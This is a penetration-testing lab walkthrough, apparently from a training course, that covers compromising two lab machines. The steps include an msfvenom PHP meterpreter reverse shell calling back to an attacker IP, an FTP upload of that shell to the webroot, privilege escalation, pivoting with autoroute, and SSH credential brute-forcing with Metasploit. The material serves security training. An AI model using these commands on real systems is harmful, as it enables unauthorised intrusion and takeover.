Black-box 3
You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.
Some machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.
If you are stuck on one of the machines, don't overthink and start pentesting another one.
When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.
This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.
The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!
Goals
Discover and exploit all machines on the network
Read all flag files (one per machine)
Obtain root privileges on both machines (meterpreter's autoroute functionality and ncrack's minimal.usr list will prove useful)
What you will learn
Network discovery
Pivoting to other networks
Basic privilege escalation
Recommended tools
Dirb
Metasploit framework (recommended version 5)
Nmap
FTP Utility
Solutions
Below, you can find solutions for the engagement. Remember though that you can follow your own strategy (which may be different from the one explained below).
Step 1: CONNECT TO THE VPN
Connect to the lab environment using the provided VPN file.
Make sure you received an IP address within the 10.13.37.0/24 range.
Don't worry about the fact that you got an IP within the 10.13.37.0/24 range. The 172.16.37.0/24 range is accessible through a static route.
Step 2: DISCOVER LIVE HOSTS ON THE NETWORK
Using nmap, scan for live hosts on the 172.16.37.0/24 network.
Sort the discovered addresses (exclude your own IP address) and write the rest to a file. This file will be fed to nmap in order to perform a full TCP scan.
Use nmap with following options:
-sV for version identification
-n for disabling reverse DNS lookup
-v for Verbose
-Pn to assume host is alive
-p- to scan all the ports
-T4 to speed things up
-iL to use a list of IPs as input (ips.txt)
--open to see just open ports and not closed / filtered ones
-A for detailed information and running some scripts
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
You will come across something similar to the below.
Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Step 3: INSPECT BOTH HTTP SERVICES
Using dirb against http://172.16.37.234:40180 will result in the http://172.16.37.234:40180/xyz/ directory being discovered. This directory contains the following.
In addition, if we inspect the http://172.16.37.220 page's source code, we will come across the below.
Both the above inform us that there is another network that we are not yet capable of accessing. In order to get into it, we need to compromise one of the machines.
Step 4: INSPECT THE FTP SERVICE ON THE 172.16.37.234 MACHINE
The FTP service on port 40121 has a promising banner. Let's try to log into it using the identified ftpuser username and a password that is the same as the identified username (ftpuser).
ftp 172.16.37.234 40121
Luckily, we identified valid credentials and we are now able to explore the FTP environment.
By issuing basic commands we can identify that the FTP service allows the uploading of files into the webroot. This is a solid attack vector for remote code execution.
Now, we should focus on creating a suitable reverse shell.
Step 5: MAKE THE APPROPRIATE PREPARATIONS TO ESTABLISH A REVERSE SHELL
A possible malware to try on an Apache server could be, for example, a php-based one. Let's generate such a malware using msfvenom, as follows.
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php
lhost is your tap0 IP address
lport is the port you would like to listen on. It is recommended that you choose commonly used ports to get around firewall restrictions, instead of trying some exotic or funny ports like 31337 or the most common 4444 port.
-o specifies the output file
Note, that this meterpreter-based file should be placed inside the directory from where you run the FTP client. For example, if your meterpreter.php file is on Desktop, then before connecting to the FTP service, make sure that your current working directory is also Desktop.
Before trying to establish a meterpreter session, we should set a Metasploit listener up, as follows.
use exploit/multi/handler
set lhost 10.13.37.4
set payload php/meterpreter_reverse_tcp
set lport 53
run
Step 6: UPLOAD THE METERPRETER-BASED FILE AND OBTAIN A REMOTE ROOT SHELL
Let's go back to the FTP connection. If it has timed out, reconnect by exiting the FTP client and connecting again.
Upload the meterpreter-based file using the "put" command (Do not confuse it with the HTTP PUT verb), as follows. Note the cd html command that ensures you are uploading directly to webroot.
ftp 172.16.37.234 40121
ftpuser
ftpuser
cd html
put meterpreter.php
When uploading is complete, visit the meterpreter-based file through the browser and observe your newly-created meterpreter session being opened. Note, that the page will keep on loading and eventually display a timeout, but this is perfectly okay since all we care about is the server executing our reverse shell payload.
Using the "shell" command, we are presented with a remote terminal. Then, issue the below for a friendlier terminal prompt.
shell
bash -i
By viewing /etc/passwd you notice that ftpuser is, in fact, a privileged system user (uid 0, effectively root).
So the logical thing is to execute the below, to escalate your privileges.
su ftpuser
Enter the password: "ftpuser"- like you did when logging into FTP.
This might fail due to lack of a terminal.
In order to spawn a terminal we can use Python, as follows.
python -c 'import pty;pty.spawn("/bin/bash")';
If we look into the /var/www directory, we'll find the flag there.
Note, that you need root-level privileges to read it.
Step 7: LEVERAGE THE COMPROMISED 172.16.37.234 MACHINE TO CREATE A ROUTE TO THE SECOND NETWORK AND COMPROMISE THE REMAINING 172.16.37.220 MACHINE
Issuing an "nmap" command when inside the 172.16.37.234 machine reveals that nmap is installed. Leverage it to scan the remaining machine using its second IP address (the 172.16.50.222 one, that was identified during the web application reconnaissance phase - Step 3).
An SSH service is running on 172.16.50.222. Background the shell by pressing ctrl + z. When the meterpreter > prompt appears, use meterpreter's autoroute functionality in order to access it. You can do this, as follows.
run autoroute -s 172.16.50.0/24
Step 8: BRUTEFORCE / GUESS SSH CREDENTIALS USING METASPLOIT'S SSH_LOGIN MODULE
Autoroute routes our exploitation attempts through the first compromised machine and enables us to access the remaining machine, through the second network (172.16.50.0/24). As seen above, having access to that network made us capable of identifying and accessing additional services running on the remaining machine.
Let's focus on the SSH one. We can now leverage Metasploit's ssh_login module to guess valid SSH credentials. We can do that as follows.
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run
After a short time, a new Meterpreter session will be opened.
You can switch to the newly opened session, as follows.
sessions -i 3
bash -i
Finally, if you navigate to the home directory (/root), you will come across the flag .flag.txt.
Note, that you will see the flag in the directory contents only after executing ls with the "-la" parameters since it is a hidden file.
STATUS
Lab Not Running
LAB NOT RUNNING
Start the lab and you’ll be able to download a VPN File and connect.
Penetration Testing Approach - Study Guide
Career Paths - Study Guide
Comments
Post a Comment